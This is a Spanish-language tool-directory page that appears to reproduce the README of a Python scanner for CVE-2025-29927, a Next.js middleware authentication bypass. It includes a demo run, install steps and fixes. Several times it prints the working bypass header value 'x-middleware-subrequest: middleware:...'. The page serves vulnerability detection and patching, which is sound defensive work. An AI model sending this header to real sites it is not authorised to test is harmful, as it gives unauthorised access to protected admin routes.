Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-29927 — 🔐 Escáner inteligente basado en Python para CVE-2025-29927: vulnerabilidad de omisión de autenticación de middleware de Next.js. Detecta meta refresh, redirecciones basadas en palabras clave y más. | Kitploit
Herramientas/GitHubGitHub/sagsooz/cve-2025-29927
Escáneres de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHubsagsooz/cve-2025-29927

CVE-2025-29927

🔐 Escáner inteligente basado en Python para CVE-2025-29927: vulnerabilidad de omisión de autenticación de middleware de Next.js. Detecta meta refresh, redirecciones basadas en palabras clave y más.

Ver Repositorio
8hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔍 CVE-2025-29927 - Detector de Omisión de Middleware en Next.js

Este escáner inteligente basado en Python ayuda a detectar la vulnerabilidad CVE-2025-29927 en aplicaciones Next.js: una omisión crítica de middleware que permite a los atacantes saltarse la autenticación usando una cabecera HTTP manipulada.

🧠 La herramienta no solo identifica redirecciones HTTP, sino también mecanismos de redirección del lado del cliente como <meta http-equiv="refresh">, redirecciones de inicio de sesión basadas en palabras clave y omisiones silenciosas de autenticación.


🚀 Características

  • ✅ Entrada interactiva (URL objetivo y ruta)
  • ✅ Detección inteligente de:
    • Cabeceras de omisión x-middleware-subrequest
    • Redirecciones basadas en <meta refresh>
    • Contenido HTML con palabras clave como login, sign in, authentication
  • ✅ Salida CLI con códigos de color:
    • 🟩 Verde para respuestas 2xx
    • 🟨 Amarillo para 3xx
    • 🟥 Rojo para 4xx/5xx
  • ✅ Salida anticipada si la omisión tiene éxito
  • ✅ Fácil de ampliar y personalizar

📸 Demostración

$ python3 CVE-2025-29927.py

🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin

→ Testing with header: middleware:middleware:middleware:middleware:middleware
   ↳ HTTP Status: 200
   ↳ Redirect detected: No

✅ VULNERABLE! Bypass successful with header:
   x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

🧑‍💻 Cómo Usar

1. Clonar el repositorio:

git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927

2. Instalar dependencias:

pip install -r requirements.txt

3. Ejecutar el script:

python3 CVE-2025-29927.py

📂 Estructura del Proyecto

.
├── CVE-2025-29927.py   # Main interactive scanner
├── requirements.txt            # Python dependencies
└── README.md                   # This file

📦 requirements.txt

requests
beautifulsoup4
colorama

🛡️ Cómo Solucionarlo

Si tu aplicación está afectada, haz lo siguiente:

  1. Actualiza Next.js a v15.2.3 o posterior (o 14.2.25+ / 13.5.7+)
  2. Refuerza el enrutamiento del middleware y evita depender únicamente del middleware para la autenticación.
  3. Elimina la cabecera x-middleware-subrequest en el borde (por ejemplo, Nginx):
proxy_set_header x-middleware-subrequest "";

ℹ️ Acerca de la Vulnerabilidad

CVE-2025-29927 permite a los atacantes omitir las comprobaciones del middleware de Next.js manipulando la cabecera x-middleware-subrequest con valores diseñados como:

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

En versiones vulnerables, esto desactiva por completo la ejecución del middleware — permitiendo el acceso directo a rutas protegidas como /dashboard, /admin, etc.


📬 Contacto

Mantenido por: @mrzblackhat
No dudes en contactarme por Telegram para sugerencias, mejoras o contribuciones.


🏷 Etiquetas

next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking


📄 Licencia

Esta herramienta se proporciona solo con fines educativos y de investigación. Úsala de forma responsable.

Descargar herramienta